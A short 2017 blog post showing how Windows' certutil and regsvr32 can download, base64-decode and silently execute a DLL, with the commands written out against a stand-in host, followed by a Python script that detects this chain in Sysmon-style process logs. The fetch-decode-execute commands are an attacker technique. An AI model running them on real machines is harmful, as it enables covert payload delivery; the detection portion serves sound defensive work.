Monday, August 21, 2017

Certutil for delivery of files


Quick post putting together some Twitter awesomeness.

References:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936

Let's do it

1. Create your DLL.
2. Base64-encode it (optional).
3. Pull it down with certutil: certutil.exe -urlcache -split -f http://example/file.txt file.blah
4. Base64-decode the file with certutil.
5. Execute the DLL with regsvr32: regsvr32 /s /u mydll.dll
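From the defender's side, the chain above leaves a recognisable trail in process-creation telemetry: certutil invoked with -urlcache plus a URL, certutil used for -encode/-decode, and regsvr32 silently unregistering (/s /u) a DLL that does not live under the Windows directory. The following Python script is an added example, not code from the original post; the sample events are constructed to mimic the Image and CommandLine fields of Sysmon Event ID 1, and the detection names (certutil_download, certutil_base64, regsvr32_unregister_nonsystem) are my own labels.

```python
"""Flag certutil/regsvr32 command lines matching the download -> decode -> execute chain.

Added detection example. SAMPLE_EVENTS are constructed records shaped like
Sysmon Event ID 1 (Image, CommandLine); real events would be read from EVTX/XML.
"""
import re

# Constructed sample process-creation events: (Image, CommandLine).
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil.exe -urlcache -split -f http://example/file.txt file.blah"),
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil -decode file.blah mydll.dll"),
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s /u mydll.dll"),
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil -dump C:\\certs\\server.cer"),                 # benign: certificate dump
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s C:\\Windows\\System32\\msxml3.dll"),        # benign: system DLL registration
]

URL_RE = re.compile(r"^https?://", re.IGNORECASE)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def flags_of(tokens):
    """Normalise switches such as -urlcache, /URLCache or /s to lowercase names."""
    return {t[1:].lower() for t in tokens[1:] if t[:1] in "-/" and len(t) > 1}


def classify(image, cmdline):
    """Return the list of detection names that fire for one process-creation event."""
    exe = image.rsplit("\\", 1)[-1].lower()
    tokens = tokenize(cmdline)
    flags = flags_of(tokens)
    hits = []
    if exe == "certutil.exe":
        # Download: -urlcache together with an http(s) URL anywhere on the line.
        if "urlcache" in flags and any(URL_RE.match(t) for t in tokens):
            hits.append("certutil_download")
        # Base64 handling: -encode or -decode of an arbitrary file.
        if flags & {"encode", "decode"}:
            hits.append("certutil_base64")
    elif exe == "regsvr32.exe":
        # /u calls DllUnregisterServer; the last non-switch argument is the DLL path.
        args = [t for t in tokens[1:] if t and t[:1] not in "-/"]
        dll = args[-1] if args else ""
        if "u" in flags and dll and "\\windows\\" not in dll.lower():
            hits.append("regsvr32_unregister_nonsystem")
    return hits


def scan(events):
    """Run classify() over every event and keep only those that produced a hit."""
    results = []
    for image, cmdline in events:
        hits = classify(image, cmdline)
        if hits:
            results.append((cmdline, hits))
    return results


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):32s} <- {cmdline}")
```

Running it on the constructed events prints three hits (the download, the decode and the silent unregister) and stays quiet on the two benign lines. In a real deployment the same three rules would be expressed as a Sysmon or SIEM query over the CommandLine field; correlating all three on one host within a short window is a far stronger signal than any single one, since certutil -urlcache also appears in legitimate certificate-chain fetching.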


CG